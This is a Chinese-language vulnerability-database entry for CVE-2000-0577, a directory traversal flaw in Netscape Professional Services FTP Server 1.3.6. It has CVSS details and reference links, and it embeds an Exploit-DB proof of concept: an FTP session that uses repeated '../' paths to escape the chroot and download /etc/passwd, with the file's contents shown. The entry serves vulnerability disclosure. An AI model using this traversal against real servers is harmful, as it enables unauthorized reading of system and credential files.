CVE-2000-0577
CVSS10.0
发布时间 :2000-06-21 00:00:00
修订时间 :2008-09-10 15:05:04
NMCOE    

[原文]Netscape Professional Services FTP Server 1.3.6 allows remote attackers to read arbitrary files via a .. (dot dot) attack.


[CNNVD]Netscape Professional Services FTP服务器漏洞(CNNVD-200006-079)

        Netscape Professional Services FTP Server 1.3.6版本存在漏洞。远程攻击者借助..(点 点)攻击可以读取任意文件。

- CVSS (基础分值)

CVSS分值: 10 [严重(HIGH)]
机密性影响: COMPLETE [完全的信息泄露导致所有系统文件暴露]
完整性影响: COMPLETE [系统完整性可被完全破坏]
可用性影响: COMPLETE [可能导致系统完全宕机]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0577
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2000-0577
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200006-079
(官方数据源) CNNVD

- 其它链接及资源

http://www.securityfocus.com/templates/archive.pike?list=1&msg=Pine.LNX.4.21.0006211351280.23780-100000@nimue.tpi.pl
(VENDOR_ADVISORY)  BUGTRAQ  20000621 Netscape FTP Server - "Professional" as hell :>
http://www.securityfocus.com/bid/1411
(UNKNOWN)  BID  1411
http://archives.neohapsis.com/archives/bugtraq/2000-06/0345.html
(UNKNOWN)  BUGTRAQ  20000629 (forw) Re: Netscape ftp Server (fwd)

- 漏洞信息

Netscape Professional Services FTP服务器漏洞
危急 访问验证错误
2000-06-21 00:00:00 2005-07-27 00:00:00
远程※本地  
        Netscape Professional Services FTP Server 1.3.6版本存在漏洞。远程攻击者借助..(点 点)攻击可以读取任意文件。

- 公告与补丁

        Users of affected software can contact Uwe Springmann for patch information.

- 漏洞信息 (20046)

Netscape Professional Services FTP Server (LDAP Aware) 1.3.6 FTP Server Vulnerability (EDBID:20046)
unix remote
2000-06-21 Verified
0 Michael Zalewski
N/A [点击下载]
source: http://www.securityfocus.com/bid/1411/info

Certain versions of the LDAP-aware Netscape Professional Services FTP Server (distributed with Enterprise Web Server) have a serious vulnerability which may lead to a remote or local root compromise. The vulnerability in essence is a failure of of the FTP server to enforce a restricted user environment (chroot). By failing to do this an FTP (anonymous or otherwise) user may download any file on the system (/etc/passwd etc.) as well as upload files at will at the privilege level of the FTP daemon.

Furthermore (quoted from the original attached message) this FTP server supports LDAP users; different LDAP accounts are served on single physical UID. This means, any user can access and eventually overwrite files on other accounts; as it's used in cooperation with webserver, typically virtual web servers are affected. 

$ ftp ftp.XXXX.xxx
Connected to ftp.XXXX.xxx.
220-FTP Server - Version 1.36 - (c) 1999 Netscape Professional Services
220 You will be logged off after 1200 seconds of inactivity.
Name (ftp.XXXX.xxx:lcamtuf): anonymous
331 Anonymous user OK, send e-mail address as password.
Password:
230 Logged in OK
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> cd ../../../dupa
550 Can't change directory to
"/www1/customer/www.XXXX.xxx/a/n/o/n/anonymous/dupa" because No such
file or directory

[Well... this won't work... uh, lovely physical path, btw ;]

ftp> cd /../../../dupa
550 Can't change directory to
"/www1/customer/www.XXXX.xxx/a/n/dupa" because No such file or
directory
ftp> cd /../../../../dupa
550 Can't change directory to
"/www1/customer/www.XXXX.xxx/a/dupa" because
No such file or directory

[Erm? Good God!]

ftp> cd /../../../../../../../../etc/dupa
550 Can't change directory to "/etc/dupa" because No such file or
directory
ftp> cd /../../../../../../../../etc/
250 CWD command successful.
ftp> get /../../../../../../../../etc/passwd KUKU
local: KUKU remote: /../../../../../../../../etc/passwd
200 PORT successfull, connected to A.B.C.D port 62437
150-Type of object is "unknown/unknown". Transfer MODE is BINARY.
150 Opening data connection
226 File downloaded successfully (602 bytes, 602 bytes xmitted)
602 bytes received in 1.71 secs (0.34 Kbytes/sec)
ftp> quit
221-Goodbye. You uploaded 0 and downloaded 1 kbytes.
221 CPU time spent on you: 0.100 seconds.

$ cat KUKU
root:x:0:1:Super-User:/:/sbin/sh
daemon:x:1:1::/:
bin:x:2:2::/usr/bin:
sys:x:3:3::/:
adm:x:4:4:Admin:/var/adm:
... 		

- 漏洞信息

1435
Netscape Professional Services FTP Server Traversal Arbitrary File Access
Context Dependent Information Disclosure
Loss of Confidentiality Patch / RCS
Exploit Public Third-party Verified

- 漏洞描述

- 时间线

2000-06-21 Unknow
Unknow Unknow

- 解决方案

Currently, there are no known workarounds or upgrades to correct this issue. However, the vendor has reportedly released a patch to address this vulnerability.

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站